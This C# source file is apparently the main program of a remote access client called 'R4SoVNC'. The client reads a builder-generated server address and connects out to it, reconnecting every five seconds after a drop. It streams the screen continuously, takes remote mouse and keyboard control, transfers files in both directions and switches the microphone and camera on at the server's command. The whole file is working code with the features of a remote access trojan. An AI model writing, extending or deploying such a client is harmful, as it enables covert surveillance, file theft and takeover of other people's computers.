using System;
using System.IO;
using System.Threading;
using System.Threading.Tasks;
using R4SoVNC.Client.Capture;
using R4SoVNC.Client.FileTransfer;
using R4SoVNC.Client.Input;
using R4SoVNC.Client.Network;
using R4SoVNC.Client.Protocol;

namespace R4SoVNC.Client
{
    internal class Program
    {
        private static ServerConnection _conn = new();
        private static ScreenCapturer _capturer = new(50);
        private static FileHandler _fileHandler = null!;
        private static AudioCapturer? _audio;
        private static CameraCapturer? _camera;

        static void Main(string[] args)
        {
            string host = "127.0.0.1";
            int port = 7890;

            // Load embedded config generated by builder
            string cfgFile = Path.Combine(AppDomain.CurrentDomain.BaseDirectory, "config.gen.txt");
            if (File.Exists(cfgFile))
            {
                var lines = File.ReadAllLines(cfgFile);
                if (lines.Length >= 1) host = lines[0].Trim();
                if (lines.Length >= 2 && int.TryParse(lines[1].Trim(), out int p)) port = p;
            }

            _fileHandler = new FileHandler(_conn);
            _audio       = new AudioCapturer(_conn);
            _camera      = new CameraCapturer(_conn);

            _conn.PacketReceived += OnPacketReceived;
            _conn.Disconnected += () =>
            {
                Console.WriteLine("[R4SoVNC] Disconnected. Retrying in 5s...");
                _audio.Stop();
                _camera.Stop();
                Thread.Sleep(5000);
                TryConnect(host, port);
            };

            TryConnect(host, port);

            // Block main thread
            Thread.Sleep(Timeout.Infinite);
        }

        private static void TryConnect(string host, int port)
        {
            Console.WriteLine($"[R4SoVNC] Connecting to {host}:{port}...");
            while (!_conn.Connect(host, port))
            {
                Console.WriteLine("[R4SoVNC] Connection failed. Retrying in 5s...");
                Thread.Sleep(5000);
            }
            Console.WriteLine("[R4SoVNC] Connected.");
            _conn.Send(new Packet(PacketType.ClientInfo, Environment.MachineName));
            Task.Run(ScreenStreamLoop);
        }

        private static async Task ScreenStreamLoop()
        {
            while (_conn.IsConnected)
            {
                try
                {
                    byte[] frame = _capturer.Capture();
                    _conn.Send(new Packet(PacketType.ScreenData, frame));
                }
                catch (Exception ex)
                {
                    Console.WriteLine($"[R4SoVNC] Screen error: {ex.Message}");
                }
                await Task.Delay(33); // ~30 fps
            }
        }

        private static void OnPacketReceived(Packet packet)
        {
            switch (packet.Type)
            {
                case PacketType.MouseMove:
                    InputHandler.ApplyMouseMove(packet.Data);
                    break;

                case PacketType.MouseClick:
                    InputHandler.ApplyMouseClick(packet.Data);
                    break;

                case PacketType.MouseScroll:
                    InputHandler.ApplyMouseScroll(packet.Data);
                    break;

                case PacketType.KeyDown:
                case PacketType.KeyUp:
                    InputHandler.ApplyKey(packet.Data, packet.Type == PacketType.KeyDown);
                    break;

                case PacketType.FileListRequest:
                    _fileHandler.HandleFileListRequest(packet.GetDataAsString());
                    break;

                case PacketType.FileDownloadReq:
                    Task.Run(() => _fileHandler.HandleDownloadRequest(packet.GetDataAsString()));
                    break;

                case PacketType.FileUploadRequest:
                    _fileHandler.HandleUploadRequest(packet.Data);
                    break;

                case PacketType.FileUploadData:
                    _fileHandler.HandleUploadData(packet.Data);
                    break;

                case PacketType.FileUploadComplete:
                    _fileHandler.HandleUploadComplete();
                    break;

                case PacketType.MicStart:
                    Console.WriteLine("[R4SoVNC] Mic started by server.");
                    _audio?.Start();
                    break;

                case PacketType.MicStop:
                    Console.WriteLine("[R4SoVNC] Mic stopped.");
                    _audio?.Stop();
                    break;

                case PacketType.CamStart:
                    Console.WriteLine("[R4SoVNC] Camera started by server.");
                    _camera?.Start();
                    break;

                case PacketType.CamStop:
                    Console.WriteLine("[R4SoVNC] Camera stopped.");
                    _camera?.Stop();
                    break;

                case PacketType.Heartbeat:
                    _conn.Send(new Packet(PacketType.Heartbeat));
                    break;

                case PacketType.Disconnect:
                    _conn.Disconnect();
                    break;
            }
        }
    }
}
